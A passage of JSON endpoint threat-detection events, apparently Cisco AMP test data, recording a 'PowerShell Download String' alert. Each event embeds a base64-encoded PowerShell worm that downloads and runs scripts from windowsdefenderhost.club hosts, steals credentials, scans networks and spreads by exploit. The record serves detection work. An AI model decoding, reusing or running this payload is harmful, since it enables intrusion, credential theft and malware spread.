gB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20200719101800,"sig_rev":1},"detection":"apde:20200719101800","end_ts":1610640884,"engine":"apde","id":"cF3A8bacac","name":"PowerShell Download String","observables":{"file":[{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1},{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1}]},"remediated":false,"severity":"medium","silent":true,"start_ts":1610640884,"tactics":["TA0002","TA0005"],"techniques":["T1059"],"type":"activity","normalized":{"observables":{"file":{"name":["wmiprvse.exe","powershell.exe"],"path":["c:\\windows\\system32\\wbem","c:\\windows\\system32\\windowspowershell\\v1.0"]}},"name":"powershell download string"},"ts":1610640884},"tactics":["TA0002","TA0005"],"techniques":["T1059"]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":791000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"PowerShell Download String","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuA